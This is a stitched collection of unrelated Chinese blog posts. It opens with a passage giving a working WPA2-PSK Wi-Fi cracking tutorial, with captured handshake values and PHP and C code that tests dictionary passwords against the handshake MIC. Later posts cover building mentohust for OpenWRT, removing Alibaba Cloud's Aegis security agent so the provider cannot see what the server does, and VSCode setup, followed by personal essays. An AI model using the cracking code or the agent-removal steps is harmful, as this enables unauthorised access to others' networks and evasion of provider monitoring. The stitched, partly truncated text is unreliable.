
第一次握手：

AP向STA发送一个数据帧，包含了AP_Nonce。

在第一次握手与第二次握手之间：

STA收到AP_Nonce之后，也随机生成一个32字节的随机数，叫做STA_Nonce。此时STA同时知道了AP_MAC、STA_MAC、AP_Nonce和STA_Nonce四个要素，于是通过算法

1
2
3
4
5
6
7

ptk_data="Pairwise key expansion\0"
          +min(AP_MAC,STA_MAC)
          +max(AP_MAC,STA_MAC)
          +min(AP_Nonce,STA_Nonce)
          +max(AP_Nonce,STA_Nonce)
          +"\0";
ptk=hmac_sha1(ptk_data,psk,16);

得到ptk。算法中，+号表示将数据段串联，min(a,b)表示a和b两端数据按字节比较，取小的那个，max(a,b)反之。因此ptk_data的长度是strlen(“Pairwise key expansion\0”)+26+232+1=23+12+64+1=100字节。
然后，把之前得到的psk当作密钥，对数据ptk_data进行hmac_sha1加密，得到一个长度为16字节的结果ptk。

再接下来，STA构造好要发送给AP的数据帧，把其中的数据负载部分（802.1X Authentication）取出，记作step2_data（step2_data共121字节），然后执行算法：

1

mic=hmac_sha1(step2_data,ptk,16);

第二次握手：

STA向AP发送一个数据帧，包含了一个关键数据STA_Nonce与mic。

于是，握手的前两次就算完成了。其实AP在收到第二次握手后，也以相同的算法计算mic，如果和客户端传来的相等，那么认为客户端有正确的密码。

阶段三：破解思路

由以上步骤可以得到破解思路如下：

由以上步骤可以得到破解思路如下：

1. 抓包，得到前两次握手包，进而得到SSID、AP_MAC、STA_MAC、AP_Nonce、STA_Nonce、step2_data与mic。

2. 选定一个可能的密码password，执行下列算法：

   1 2 3 4 5 6 7 8 9

   psk=pbkdf2_sha1(password,SSID,4096,64); ptk_data="Pairwise key expansion\0" +min(AP_MAC,STA_MAC) +max(AP_MAC,STA_MAC) +min(AP_Nonce,STA_Nonce) +max(AP_Nonce,STA_Nonce) +"\0"; ptk=hmac_sha1(ptk_data,psk,16); mic=hmac_sha1(step2_data,ptk,16);

   得到mic，与收集到的mic比较，如果相等，那么password极有可能就是正确的密钥了。

3. 不断迭代步骤2，穷举整个字典，直到搜索到密码或穷尽为止。

阶段四：破解案例

该案例来自《WPA/WPA2-PSK认证过程》，再次表示感谢！
首先是抓到的四次握手数据帧，为了方便大家研究，在此提供下载链接。用wireshark打开以后，可以看到有4个握手包，如图：

这个热点的SSID是“TP-LINK_4F6C90”，这个无法从握手包中得知，不过要攻击者自己肯定知道。SSID转换成16进制就是：

1

54 50 2d 4c 49 4e 4b 5f 34 46 36 43 39 30

查看第一个握手包，可以看到如图：

所以得知AP_Nonce是

1

33 20 ce d2 53 5e d6 97 d5 2c 27 2a ee a7 99 d4 d1 88 a4 60 31 42 f3 7a 24 0f 80 64 d7 cd f5 88

同时也可以得知AP_MAC为

1

20 dc e6 4f 6c 90

STA_MAC为

1

e0 b9 a5 1f e7 94

接着，查看第二个握手包，可以看到如图：

所以得知STA_Nonce是

1

b4 45 5d 0b c4 46 64 5c 59 57 43 4f 65 3a d0 bf a5 9f 6b e1 a2 65 fb f3 3b 7d 54 7b 1b 48 45 34

同时，从第二个握手包中还可以得到MIC为

1

88 73 42 b8 16 1d f2 30 c8 48 80 cb e9 07 4f f8

如图：

现在就差step2_data了。step2_data就是LLC的负载，如图：

不过需要注意的是，客户端在计算mic之前，step2_data中mic对应的16字节全是0，所以step2_data应该是：

1
2
3
4
5
6

01 03 00 75 02 01 0a 00 00 00 00 00 00 00 00 00 01 b4 45 5d 0b c4 46
64 5c 59 57 43 4f 65 3a d0 bf a5 9f 6b e1 a2 65 fb f3 3b 7d 54 7b 1b
48 45 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 16 30 14 01 00 00 0f ac 04 01 00 00 0f ac 04 01 00
00 0f ac 02 00 00

至此，所需的SSID、AP_MAC、STA_MAC、AP_Nonce、STA_Nonce、step2_data与mic都已经到手了。

让我们用php来写一个验证密码正确与否的函数：

1
2
3
4
5
6
7
8
9
10
11
12
13

function is_password($p_handshake,$p_password)
{
    $t_psk=hash_pbkdf2("sha1",$p_password,$p_handshake["ssid"],4096,32,true);
    $t_ptk_data="Pairwise key expansion\0"
                .min($p_handshake["ap_mac"],$p_handshake["sta_mac"])
                .max($p_handshake["ap_mac"],$p_handshake["sta_mac"])
                .min($p_handshake["ap_nonce"],$p_handshake["sta_nonce"])
                .max($p_handshake["ap_nonce"],$p_handshake["sta_nonce"])
                ."\0";
    $t_ptk=hash_hmac("sha1",$t_ptk_data,$t_psk,true);
    $t_mic=hash_hmac("sha1",$p_handshake["step2_data"],substr($t_ptk,0,16),true);
    return substr($t_mic,0,16)==$p_handshake["mic"];
}

以上述的数据为例，使用该函数的代码如下：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

$g_handshake=array();
$g_handshake["ssid"]=hex2bin("54502d4c494e4b5f344636433930");
$g_handshake["ap_mac"]=hex2bin("20dce64f6c90");
$g_handshake["sta_mac"]=hex2bin("e0b9a51fe794");
$g_handshake["ap_nonce"]=hex2bin("3320ced2535ed697d52c272aeea799d4d188a4603142f37a240f8064d7cdf588");
$g_handshake["sta_nonce"]=hex2bin("b4455d0bc446645c5957434f653ad0bfa59f6be1a265fbf33b7d547b1b484534");
$g_handshake["step2_data"]=hex2bin("0103007502010a00000000000000000001b4455d0bc446645c5957434f653ad0bfa59f6be1a265fbf33b7d547b1b484534000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020000");
$g_handshake["mic"]=hex2bin("887342b8161df230c84880cbe9074ff8");

function is_password($p_handshake,$p_password)
{
    $t_psk=hash_pbkdf2("sha1",$p_password,$p_handshake["ssid"],4096,32,true);
    $t_ptk_data="Pairwise key expansion\0"
                .min($p_handshake["ap_mac"],$p_handshake["sta_mac"])
                .max($p_handshake["ap_mac"],$p_handshake["sta_mac"])
                .min($p_handshake["ap_nonce"],$p_handshake["sta_nonce"])
                .max($p_handshake["ap_nonce"],$p_handshake["sta_nonce"])
                ."\0";
    $t_ptk=hash_hmac("sha1",$t_ptk_data,$t_psk,true);
    $t_mic=hash_hmac("sha1",$p_handshake["step2_data"],substr($t_ptk,0,16),true);
    return substr($t_mic,0,16)==$p_handshake["mic"];
}

$g_password="LINUXZSJ";
echo is_password($g_handshake,$g_password);

程序输出1，说明”LINUXZSJ”是该AP的密码。

阶段五：用C语言实现

php因为语法简单明晰，用来演示算法不错，但真用来大规模计算，效率不敢恭维。在我机器上，循环1000次，php用时12.6秒，而C用时2.6秒，将近5倍！

C语言的实现就不解释了，直接给出代码。共fastpbkdf2.h、fastpbkdf2.c、hmac.h、hmac_sha1.c、wpa2break.h、wpa2break.c和main.c七个文件。其中，fastpbkdf2.h和fastpbkdf2.c的源码请参考《pbkdf2-shaX摘要算法以及C语言实现》，而hmac.h、hmac_sha1.c的源码请参考《hmac-sha1摘要算法以及C语言实现》。以下给出wpa2break.h、wpa2break.c和main.c的源码～

• wpa2break.h

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41

  #ifndef WPA2BREAK_H #define WPA2BREAK_H #include <stdint.h> #define WPA2_SSID_MAX_LEN 32 #define WPA2_MAC_LEN 6 #define WPA2_NONCE_LEN 32 #define WPA2_STEP2_DATA_LEN 121 #define WPA2_MIC_OFFSET 81 #define WPA2_PSK_LEN 32 #define WPA2_PBKDF2_LOOP 4096 #define WPA2_WORD "Pairwise key expansion\0" #define WPA2_WORD_LEN 23 #define WPA2_PTK_LEN 16 #define WPA2_PTK_DATA_LEN (WPA2_WORD_LEN+2*WPA2_MAC_LEN+2*WPA2_NONCE_LEN+1) #define WPA2_MIC_LEN 16 typedef struct { uint8_t ssid[WPA2_SSID_MAX_LEN]; uint8_t ssid_len; uint8_t ap_mac[WPA2_MAC_LEN]; uint8_t sta_mac[WPA2_MAC_LEN]; uint8_t ap_nonce[WPA2_NONCE_LEN]; uint8_t sta_nonce[WPA2_NONCE_LEN]; uint8_t step2_data[WPA2_STEP2_DATA_LEN]; uint8_t step2_mic[WPA2_MIC_LEN]; struct { uint8_t ptk_data[WPA2_PTK_DATA_LEN]; } mid_value; } wpa2_handshake_t; void wpa2break_init_mid_value(wpa2_handshake_t* p_handshake); int wpa2break_is_password(wpa2_handshake_t* p_handshake,uint8_t* p_password,uint8_t p_len); #endif

• wpa2break.c

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48

  #include "wpa2break.h" #include "fastpbkdf2.h" #include "hmac.h" #include <string.h> #include <stdio.h> static void mem_min_max(uint8_t** p_min,uint8_t** p_max,uint8_t p_len) { int t_cmp=memcmp(*p_min,*p_max,p_len); if(t_cmp>0) { uint8_t* p_temp=*p_min; *p_min=*p_max; *p_max=p_temp; } } void wpa2break_init_mid_value(wpa2_handshake_t* p_handshake) { uint8_t* t_ptk_data=p_handshake->mid_value.ptk_data; memcpy(t_ptk_data,WPA2_WORD,WPA2_WORD_LEN); uint8_t* t_min=p_handshake->ap_mac; uint8_t* t_max=p_handshake->sta_mac; mem_min_max(&t_min,&t_max,WPA2_MAC_LEN); memcpy(t_ptk_data+WPA2_WORD_LEN,t_min,WPA2_MAC_LEN); memcpy(t_ptk_data+WPA2_WORD_LEN+WPA2_MAC_LEN,t_max,WPA2_MAC_LEN); t_min=p_handshake->ap_nonce; t_max=p_handshake->sta_nonce; mem_min_max(&t_min,&t_max,WPA2_NONCE_LEN); memcpy(t_ptk_data+WPA2_WORD_LEN+2*WPA2_MAC_LEN,t_min,WPA2_NONCE_LEN); memcpy(t_ptk_data+WPA2_WORD_LEN+2*WPA2_MAC_LEN+WPA2_NONCE_LEN,t_max,WPA2_NONCE_LEN); t_ptk_data[WPA2_PTK_DATA_LEN-1]=0; memset(p_handshake->step2_data+WPA2_MIC_OFFSET,0,WPA2_MIC_LEN); } int wpa2break_is_password(wpa2_handshake_t* p_handshake,uint8_t* p_password,uint8_t p_len) { uint8_t t_psk[WPA2_PSK_LEN]; fastpbkdf2_hmac_sha1(p_password,p_len,p_handshake->ssid,p_handshake->ssid_len,WPA2_PBKDF2_LOOP,t_psk,WPA2_PSK_LEN); uint8_t t_ptk[WPA2_PTK_LEN]; uint32_t t_ptk_len=WPA2_PTK_LEN; hmac_sha1(t_psk,WPA2_PSK_LEN,p_handshake->mid_value.ptk_data,WPA2_PTK_DATA_LEN,t_ptk,&t_ptk_len); uint8_t t_mic[WPA2_MIC_LEN]; uint32_t t_mic_len=WPA2_MIC_LEN; hmac_sha1(t_ptk,WPA2_PTK_LEN,p_handshake->step2_data,WPA2_STEP2_DATA_LEN,t_mic,&t_mic_len); return memcmp(p_handshake->step2_mic,t_mic,WPA2_MIC_LEN)==0; }

• main.c

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46

  #include <stdio.h> #include <string.h> #include "wpa2break.h" static int hex2dig(char p_hex) { if('0'<=p_hex&&p_hex<='9') return p_hex-'0'; if('a'<=p_hex&&p_hex<='f') return p_hex-'a'+10; return 0; } static void hex2bin(char* p_hex,uint8_t* p_bin) { int t_len=strlen(p_hex)/2; int t_i; for(t_i=0;t_i<t_len;t_i++) p_bin[t_i]=hex2dig(p_hex[2*t_i])*16+hex2dig(p_hex[2*t_i+1]); } int main() { wpa2_handshake_t t_handshake; FILE* t_file=fopen("ap1.txt","r"); char t_buffer[1024]; fgets(t_buffer,sizeof(t_buffer),t_file); hex2bin(t_buffer,t_handshake.ssid); t_handshake.ssid_len=strlen((char*)t_handshake.ssid); fgets(t_buffer,sizeof(t_buffer),t_file); hex2bin(t_buffer,t_handshake.ap_mac); fgets(t_buffer,sizeof(t_buffer),t_file); hex2bin(t_buffer,t_handshake.sta_mac); fgets(t_buffer,sizeof(t_buffer),t_file); hex2bin(t_buffer,t_handshake.ap_nonce); fgets(t_buffer,sizeof(t_buffer),t_file); hex2bin(t_buffer,t_handshake.sta_nonce); fgets(t_buffer,sizeof(t_buffer),t_file); hex2bin(t_buffer,t_handshake.step2_data); fgets(t_buffer,sizeof(t_buffer),t_file); hex2bin(t_buffer,t_handshake.step2_mic); fclose(t_file); wpa2break_init_mid_value(&t_handshake); printf("%dn",wpa2break_is_password(&t_handshake,(uint8_t*)"LINUXZSJ",8)); return 0; }

  然后是makefile文件：

  1 2 3 4 5 6 7 8 9 10 11 12 13 14

  main: main.o hmac_sha1.o fastpbkdf2.o wpa2break.o gcc main.o hmac_sha1.o fastpbkdf2.o wpa2break.o -lcrypto -o main main.o: main.c gcc -c main.c -o main.o hmac_sha1.o: hmac_sha1.c gcc -c hmac_sha1.c -o hmac_sha1.o fastpbkdf2.o: fastpbkdf2.c gcc -c fastpbkdf2.c -std=c99 -o fastpbkdf2.o wpa2break.o: wpa2break.c gcc -c wpa2break.c -o wpa2break.o

  并附上main.c中需要使用的ap1.txt文件：

  1 2 3 4 5 6 7

  54502d4c494e4b5f344636433930 20dce64f6c90 e0b9a51fe794 3320ced2535ed697d52c272aeea799d4d188a4603142f37a240f8064d7cdf588 b4455d0bc446645c5957434f653ad0bfa59f6be1a265fbf33b7d547b1b484534 0103007502010a00000000000000000001b4455d0bc446645c5957434f653ad0bfa59f6be1a265fbf33b7d547b1b4845340000000000000000000000000000000000000000000000000000000000000000887342b8161df230c84880cbe9074ff8001630140100000fac040100000fac040100000fac020000 887342b8161df230c84880cbe9074ff8

  ap1.txt一行表示一个数据，从上到下依次是SSID、AP_MAC、STA_MAC、AP_Nonce、STA_Nonce、step2_data和MIC。

参数信息

设备型号: GL-MT300N Version1
OpenWRT版本: 19.07.7
Soc: MediaTek MT7620N

准备工作

• 已刷入OpenWRT的路由器
• 安装了Linux的物理机/VPS/虚拟机或者已经安装了WSL的Windows10
• 如果中国大陆境内进行编译操作，个人建议为Linux环境更换软件源，推荐使用清华大学开源软件镜像站

本次我使用了已经安装了Ubuntu 18.04LTS的VPS进行编译

依赖安装

打开终端，输入以下指令安装编译必要程序

1

sudo apt-get install build-essential bison flex zlib1g-dev libncurses5-dev subversion quilt intltool ruby fastjar unzip gawk autogen autopoint ccache gettext libssl-dev xsltproc zip git

准备编译文件夹

1. 在终端中建立一个文件夹便于管理,例如我创建的文件夹为 openwrt ，文件夹命名可以根据自己需要变化

   1 2 3

   cd ~ sudo mkdir openwrt cd openwrt

2. 前往OpenWRT官网下载和你的路由器芯片以及系统版本所对应的SDK，在这里我们使用的GL-MT300N的芯片为mt7620，系统为19.07.7：

   1 2 3 4

   wget https://downloads.openwrt.org/releases/19.07.7/targets/ramips/mt7620/openwrt-sdk-19.07.7-ramips-mt7620_gcc-7.5.0_musl.Linux-x86_64.tar.xz -O sdk.tar.xz tar xvf sdk.tar.xz mv openwrt-sdk-19.07.7-ramips-mt7620_gcc-7.5.0_musl.Linux-x86_64 sdk rm -rf sdk.tar.xz

3. 下载libpcap的源码到 libpcap 文件夹，本文成文时最新版本为1.10.1

   1 2 3 4

   wget https://www.tcpdump.org/release/libpcap-1.10.1.tar.gz tar xvf libpcap-1.10.1.tar.gz mv libpcap-1.10.1 libpcap rm -rf libpcap-1.10.1.tar.gz

4. 下载mentohust的源代码到 mentohust 文件夹，github 上目前有大量的 mentohust 源码包，可以自行选择，此处我们选择使用 hyrathb/mentohust

   1	git clone https://github.com/hyrathb/mentohust.git mentohust

交叉编译

从这里开始就是我们今天的大头，交叉编译的部分

配置交叉编译环境

在终端内输入

1
2
3
4
5
6
7
8
9
10
11
12

PATH=$PATH:~/openwrt/sdk/staging_dir/toolchain-mipsel_24kec+dsp_gcc-4.8-linaro_uClibc-0.9.33.2/bin
export PATH
STAGING_DIR=~/openwrt/sdk/staging_dir/toolchain-mipsel_24kec+dsp_gcc-4.8-linaro_uClibc-0.9.33.2
export STAGING_DIR
export CC=mipsel-openwrt-linux-gcc
export CPP=mipsel-openwrt-linux-cpp
export GCC=mipsel-openwrt-linux-gcc
export CXX=mipsel-openwrt-linux-g++
export RANLIB=mipsel-openwrt-linux-ranlib
export ac_cv_linux_vers=3.18.27
export LDFLAGS="-static"
export CFLAGS="-Os -s"

请不要直接复制粘贴，这里需要根据你的自身情况进行更改
需要更改的地方有：

• CC、CPP、GCC、CXX、RANLIB 请对比参考…/staging_dir//bin 内的对应文件名进行修改
• RANLIB 要根据 sdk 里目录的结尾修改。在本例中，结尾是 uClibc，因此 export RANLIB=mipsel-openwrt-linux-uClibc-ranlib。如果你的结尾是 musl，就应该改成 export RANLIB=mipsel-openwrt-linux-musl-ranlib
• ac_cv_linux_vers 为你所编译目标 OpenWrt 当前 Linux 内核版本号

编译libpcap

1. 进入 libpcap 文件夹

   1	cd ~/openwrt/libpcap

2. 编译libpcap

   1 2	./configure --host=mipsel-linux --prefix=~/openwrt --with-pcap=linux make

   请不要直接复制粘贴，这里需要根据你的自身情况进行更改
   需要更改的地方有：

• --host 需要对应你的路由器芯片架构进行修改 (arm-linux/mipsel-linux)
• --prefix 更换成你的编译路径，本例中为~/openwrt

原则上来说 ./configure 部分不应出现报错，make 部分可能会出现 libpcap.so 编译出错的报错，无需理会，只要 libpcap.a 没有报错即可，编译完成后记得查看一下目录下是否出现了libpcap.a

编译mentohust

1. 进入 mentohust 文件夹并生成Makefile:

   1 2	cd ~/openwrt/mentohust sh autogen.sh

   获取自己所在的平台

   1	./config.guess

   输出的信息替换到下方代码的 --build 中，然后执行命令进行编译：

   1 2	./configure --build=x86_64-pc-linux-gnu --host=mipsel-linux --disable-encodepass --disable-notify --with-pcap=~/openwrt/libpcap/libpcap.a make

   其中 --with-pca 后内容请修改为自己的对应路径
   如果运行无误，完成后就可以在 ~/openwrt/mentohust/src 中获取所需要的 mentohust 文件了

上传运行

OpenWRT原生内嵌了 SCP 服务，在我们完成编译后，打开 WinSCP 添加工作区，选择SCP协议链接到OpenWRT，将编译出来的 mentohust 粘贴进OpenWRT
粘贴进去之后，我们需要通过 SSH 链接路由器并改变 mentohust 的权限并设置环境变量

1
2

chmod 777 mentohust
cp mentohust /usr/bin/mentohust

完成之后，直接在终端内输入 mentohust 即可启动运行。如果不确定使用哪张网卡请自行通过 ifconfig 判断。

参考文章

• 使用 WSL 交叉编译 MentoHUST - Jim’s Blog

首先，我们需要关闭阿里云盾，由于我们仅仅需要更换系统，所以节约时间，运行以下指令即可：

1. 卸载阿里云盾

   1 2 3 4 5 6

   wget http://update.aegis.aliyun.com/download/uninstall.sh chmod +x uninstall.sh sudo ./uninstall.sh wget http://update.aegis.aliyun.com/download/quartz_uninstall.sh chmod +x quartz_uninstall.sh sudo ./quartz_uninstall.sh

2. 删除残留

   1 2 3

   sudo pkill aliyun-service sudo rm -fr /etc/init.d/agentwatch /usr/sbin/aliyun-service sudo rm -rf /usr/local/aegis*

作为一个合格的不干好事的家伙，我们不仅要换系统，还要把系统换到连服务器他妈（指阿里云）都认不出来。
所以，我们需要先在控制台中更换成把服务器另一个系统。
一般来说，如果想用debian系的系统，建议把系统更换成centos之后再换纯净系统；与之对应，如果想用centos，可以先换成ubuntu：

1. 打开控制台，选择实例-强行停止；
2. 选择更换系统盘；
3. 选择更换ubuntu/centos（依上文所述选择）；
4. 等待更换完成即可

到目前为止，服务器他妈还是能认得出孩子的而且能够看出孩子干了些什么坏事。接下来，我们就要动手给服务器整容了——系统纯净化。

近期我班开课C语言程序设计，本来是件挺开心的事，但是上课的时候让我们用Visual C++ 6.0来写。这俗话说得好，编程的时候每没个趁手的IDE，编程效率都要大幅降低（沃·兹基硕德），干脆直接给弟兄们来个全套VSCode套装，顺便记录一下如何给VSCode搭好C语言的编程环境

依赖安装

最首先的，既然我们要用VSCode，我们得先安装上VSCode。下载可以前往官网下载或者直接在本站下载(64位)
接下来，为了我们能够顺利使用GCC，我们需要安装MinGW。下载可以前往SourceForge下载（慢到爆炸）或者在本站下载(64位)
另外，如果遇到提示.NET Framework的问题，请安装.NET Framework，在弹窗中直接点击是会跳转至在线安装器，个人建议下载离线版安装包进行安装。离线版安装包下载可以前往官网下载或者直接在本站下载(64位)

VSCode及必要插件处理

安装VSCode

下载完VSCode的安装包之后，双击打开，然后直接一波无脑下一步就好。但是中间有一步需要注意，在第三次点击下一步之后会来到下图这个页面，这个页面的所有选项请全部勾选。

之后点击下一步，等待完成安装即可。

必要插件

在VSCode完成安装之后，运行VSCode，找到页面左侧的一个有四个方块的图标，点进去，在左上输入框里输入Chinese(Simplified)，下方会显示一个名叫Chinese (Simplified) Language Pack for Visual Studio Code的插件，点击它右下角蓝色的Install按钮安装插件，这个插件用于VSCode的界面汉化。完成安装之后，在页面右下角会弹出一个窗口，点击Restart按钮重启程序，重启后界面将汉化。

重启结束，再次来到刚刚安装插件的地方，在输入框里输入C/C++之后下面会出现一个同名的插件，同样的方法进行安装，安装完成后无需重启。

安装MinGW并构建C语言编程环境

MinGW安装

下载完MinGW的压缩包之后，将压缩解压到没有中文的文件目录下，一般建议解压到C:\Program_Files_(x86)下并将解压出的文件夹重命名为MinGW。

构建C语言编程环境

完成解压之后，我们开始构建C语言的编程环境
*注：本安装示例中，我们将以C:\Program_Files\MinGW作为示例安装位置。
接下来请严格按照教程顺序进行操作，以防止环境构建失败

• 找到C:\Program_Files\MinGW\bin并记下这个目录位置；
• 回到桌面，右键点击此电脑图标，选择属性，进入控制面板界面；
• 点击页面左侧的高级系统设置弹出系统属性对话框并选择第三个高级选项卡;
• 点击对话框最下方的环境变量按钮；
• 在弹出的环境变量设置界面下的系统变量部分找到Path，双击打开；
• 点击弹出的新对话框的右侧的新建按钮，在出现的输入框中输入C:\Program_Files\MinGW\bin，接着一路点击确定到回到控制面板界面；
  
• 同时按下键盘上的Win+R，弹出运行窗口，输入cmd并回车打开命令提示符；
• 将gcc -v -E -x c++ -粘贴进命令行并回车运行，如显示和下图一致的内容则构建完成。
  

至此，C语言的编程环境完成构建。

为VSCode构建C语言编程环境

接下来请严格按照教程顺序进行操作，以防止环境构建失败

• 打开VSCode，点击页面最左侧的第一个纸张样式图标；
• 选择打开文件夹，选择/新建一个你喜欢的文件夹作为你的编程工程文件夹，例如D:\Clang；
  
• 选择完成之后新建一个名为.vscode的文件夹,位置应位于例如D:\Clang\.vscode，注意，最前面的点不能丢；
• 在.vscode文件夹中新建三个文件，分别命名为c_cpp_properties.json、launch.json、tasks.json;
  
• 新建完成之后将以下三段文字分别复制到对应文件中：
• 以下为c_cpp_properties.json

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39

  { "configurations": [ { "name": "Win32", "includePath": [ "${workspaceRoot}", "C:/Program_Files/MinGW/include/**", "C:/Program_Files/MinGW/bin/../lib/gcc/x86_64-w64-mingw32/8.1.0/include/c++", "C:/Program_Files/MinGW/bin/../lib/gcc/x86_64-w64-mingw32/8.1.0/include/c++/x86_64-w64-mingw32", "C:/Program_Files/MinGW/bin/../lib/gcc/x86_64-w64-mingw32/8.1.0/include/c++/backward", "C:/Program_Files/MinGW/bin/../lib/gcc/x86_64-w64-mingw32/8.1.0/include", "C:/Program_Files/MinGW/bin/../lib/gcc/x86_64-w64-mingw32/8.1.0/include-fixed", "C:/Program_Files/MinGW/bin/../lib/gcc/x86_64-w64-mingw32/8.1.0/../../../../x86_64-w64-mingw32/include" ], "defines": [ "_DEBUG", "UNICODE", "__GNUC__=6", "__cdecl=__attribute__((__cdecl__))" ], "intelliSenseMode": "msvc-x64", "browse": { "limitSymbolsToIncludedHeaders": true, "databaseFilename": "", "path": [ "${workspaceRoot}", "C:/Program_Files/MinGW/include/**", "C:/Program_Files/MinGW/bin/../lib/gcc/x86_64-w64-mingw32/8.1.0/include/c++", "C:/Program_Files/MinGW/bin/../lib/gcc/x86_64-w64-mingw32/8.1.0/include/c++/x86_64-w64-mingw32", "C:/Program_Files/MinGW/bin/../lib/gcc/x86_64-w64-mingw32/8.1.0/include/c++/backward", "C:/Program_Files/MinGW/bin/../lib/gcc/x86_64-w64-mingw32/8.1.0/include", "C:/Program_Files/MinGW/bin/../lib/gcc/x86_64-w64-mingw32/8.1.0/include-fixed", "C:/Program_Files/MinGW/bin/../lib/gcc/x86_64-w64-mingw32/8.1.0/../../../../x86_64-w64-mingw32/include" ] } } ], "version": 4 }

• 如果你的MinGW的安装位置和示例的不同请记得把上面这个json中的全部C:/Program_Files/MinGW/换成你的安装位置
• 以下为launch.json

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26

  { "version": "0.2.0", "configurations": [ { "name": "(gdb) Launch", // 配置名称，将会在启动配置的下拉菜单中显示 "type": "cppdbg", // 配置类型，这里只能为cppdbg "request": "launch", // 请求配置类型，可以为launch（启动）或attach（附加） "program": "${workspaceFolder}/${fileBasenameNoExtension}.exe", // 将要进行调试的程序的路径 "args": [], // 程序调试时传递给程序的命令行参数，一般设为空即可 "stopAtEntry": false, // 设为true时程序将暂停在程序入口处，一般设置为false "cwd": "${workspaceFolder}", // 调试程序时的工作目录，一般为${workspaceRoot}即代码所在目录 workspaceRoot已被弃用，现改为workspaceFolder "environment": [], "externalConsole": true, // 调试时是否显示控制台窗口，一般设置为true显示控制台 "MIMode": "gdb", "miDebuggerPath": "C:/Program_Files/MinGW/bin/gdb.exe", // miDebugger的路径，注意这里要与MinGw的路径对应 "preLaunchTask": "gcc", // 调试会话开始前执行的任务，一般为编译程序，c++为g++, c为gcc "setupCommands": [ { "description": "Enable pretty-printing for gdb", "text": "-enable-pretty-printing", "ignoreFailures": false } ] } ] }

• 如果你的MinGW的安装位置和示例的不同请记得把上面这个json中的全部C:/Program_Files/MinGW/换成你的安装位置
• 以下为tasks.json

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24

  { "version": "2.0.0", "command": "gcc", "args": [ "-g", "${file}", "-o", "${fileBasenameNoExtension}.exe" ], // 编译命令参数 "problemMatcher": { "owner": "cpp", "fileLocation": [ "relative", "${workspaceFolder}" ], "pattern": { "regexp": "^(.*):(\\d+):(\\d+):\\s+(warning|error):\\s+(.*)$", "file": 1, "line": 2, "column": 3, "severity": 4, "message": 5 } }

至此，VSCode的C语言编程环境也完成了构建。
接下来，你就可以在D:\Clang中进行C语言的编程了，例如新建一个helloworld.c并运行：

1
2
3
4
5
6
7
8

#include <stdio.h>
int main(void)
{
    printf("Hello Wold!\n");
    system("pause");

    return 0;
}

好了，开始你开心的编程之旅吧~

15年前的某天
同一个位置
同样的食物
不同的是
已经随着时间消逝而去的童真
与那自由自在无忧无虑的快乐

还有谁记得当年的只有小朋友才能拿到的迷你圆筒冰淇淋呢
门口的麦当劳叔叔已经被风吹雨打了几十年，但笑容仍在
又有谁知道他会在想些什么呢？尽管他不过是个塑料假人

时间冲刷着一切，犹如海浪推着我们在海面上前行，推着我们一点点的长大。
有些人和事，伴随着我们一起走过多年；有些人和事，永远的停在了当年。

下雨了，起风了。
雨停了，风止了。
人来了，人走了。
你来了，你走了。

时间就是这样，推动着我们前进，同时又在不断的冲刷着我们，身上的棱角被一点点冲刷而去，把我们变的越来越圆滑，越来越平凡。
而时间的模样从未改变，仍旧如初。

相对论告诉我们，时间不是一成不变的。
生活告诉我们，时间是我们必须承受的。

总有一天，我也会消逝在时间的长河里，甚至连一个水花都不会翻起。
嘛，那又有什么关系呢。
反正，又有多少人不是呢。

时间的尽头，会是什么样子呢？我当然很好奇，当然，我活不到那个时候。如果有人活到了那时，而且还记得曾经有人提出过这个问题，请务必在心中默念答案，我能听得见。
嘛，其实我知道答案的。
答案是42。

有个朋友要写作文结果没思路了，随便写了点给他当范文。因为是随便写的，有些地方语法措辞还有科学性也就没有太讲究，随便看看就好。

2121年，人类的科技水平在摩尔定律的技术爆炸的加持下，达到了前所未有的高度，移民其他星系和星球已不再是百年前的科幻故事。
技术爆炸的前提是要有人研究，而研究这些的人就是科学家，我的爷爷和父亲都是科学家，而我也继承了他们的事业成为了一名科学家。我们家三代科学家一同研究着同一个论题：地球人类的宇宙发展。
终于在经过我们众多科学家共同的不懈努力下，人类可以终于发展到了可以星际旅行的程度。在这之后，地球人的宇宙扩张速度变得越来越快，从最近的火星开始，再到木星，土星，冥王星，甚至离开了太阳系，一点点的蚕食着宇宙中的一个又一个星系。连原本不能发光的月球也有了大气层，开始被点点灯光照亮。成为了一颗五彩斑斓的卫星。
如今，地球人类已经有超过一半的人口移居外星，地球人口已不再有百年前那么多，甚至连一半都不到。年轻人以移居外星为时尚与潮流，地球本星剩余人口老龄化严重，防卫空虚，甚至开始有吃不上饭的趋势了。
此时的我，也已年近60，虽然对于这个时代来说60岁已经不是一个非常老的年龄了，但也已经是中年的年纪。当初我所在的地球宇宙研究院征询我们一家的意见是否要离开地球前往冥王星研究基地时，我们一家都毅然决然的拒绝了，地球是我们的根，也是我们的故乡，我们不愿离开这里。
但那天，地球遇到了大麻烦。
我们观测到一颗小行星正直冲地球而来，如果不进行拦截，一个月后地球将彻底从宇宙星图中消失。但正如我刚才所说，地球现在防卫力量空虚，光凭我们这些糟老头子根本无法拯救地球。这时地球防卫司令部联系到我，让我想尽一切办法将其拦截，哪怕动用地球的一切武器也要成功。
压在我肩头的担子变得更重了。
